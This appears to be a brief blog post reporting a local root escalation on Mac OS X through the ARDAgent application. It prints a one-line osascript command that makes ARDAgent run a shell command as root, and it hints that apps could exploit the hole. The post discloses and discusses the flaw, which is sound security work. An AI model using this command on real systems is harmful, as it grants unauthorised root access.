ARDAgent Local Explot on OSX

Ouch... Nice one. # osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; root Hopefully this is patched soon. I'm sure there are some apps out there that could make creative use of this hole. This is discussed at length on Slashdot at, "Mac OS X Root Escalation Through AppleScript".